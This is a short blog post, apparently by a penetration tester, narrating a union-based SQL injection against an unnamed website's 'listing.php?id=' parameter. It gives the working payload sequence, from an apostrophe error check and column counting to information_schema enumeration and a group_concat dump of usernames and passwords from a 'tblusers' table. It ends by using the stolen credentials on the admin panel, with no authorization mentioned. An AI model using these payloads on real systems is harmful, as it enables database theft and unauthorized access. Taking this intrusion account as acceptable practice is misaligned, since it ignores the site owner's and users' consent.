Open in app

Sign in

Write

Sign in

How I Exploited the Union Based SQL Injection Flaw to get the Database of a website and Access the admin panel?

Paras Arora
3 min readSep 5, 2019

--

SQL Injection: SQL Injection (SQLi) is a type of injection attack that makes it possible to execute malicious SQL statements. These statements control a database server behind a web application. Attackers can use SQL Injection vulnerabilities to bypass application security measures. They can go around authentication and authorization of a web page or web application and retrieve the content of the entire SQL database.

Let’s start !!

On browsing the website I noticed GET Parameter in URL of website i.e website.com/listing.php?id=1

Checking the SQL Syntax error by placing apostrophe at the end.

After placing apostrophe and browsing it, it is converted in url encoding form

‘ is changed to %27

Here comes the error in SQL Syntax which means that website is vulnerable to SQL Injection Attack.

Now, passing SQL Queries (Union Based Injection)

website url/listing.php?id=1 order by 3 --+

order by 4, 5 or etc is not displaying any result so proceeding with 3.

Need to know from which way we can execute our query.

Union select will reflect the vulnerable number on a webpage it means that we can pass our query instead of that vulnerable number.

In this case, 3 is vulnerable.

Want to know the name of the DATABASE of a website?

execute: website url/listing.php?id=1 union select 1,2,database() --+

Name Of DATABASE: outbacklabs2

Extracting tables present in DATABASE

Query: website url/listing.php?id=1 union select 1,2,table_name from information_schema.tables --+

Found useful table name : tblusers

which can contain user names of users registered.

Extracting column names from table “tblusers”

Query: website url/listing.php?id=1 union select 1,2,column_name from information_schema.columns where table_name=”tblusers” --+

Usfeful columns found: UserId,UserName,UserPwd

Finally, Extracting UserId,UserName,UserPwd

Query: website url/listing.php?id=1 union select 1,2,group_concat(UserId,0x0a,UserName,0x0a,UserPwd) from tblusers --+

0x0a is used to provide spaces in between.

Now finally providing the username and password in the admin panel of a website.

Sql

--

--

Paras Arora
Paras Arora

Written by Paras Arora

359 Followers
1 Following

Social media: @parasarora06 , Penetration Tester | Application Security

Responses (1)

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams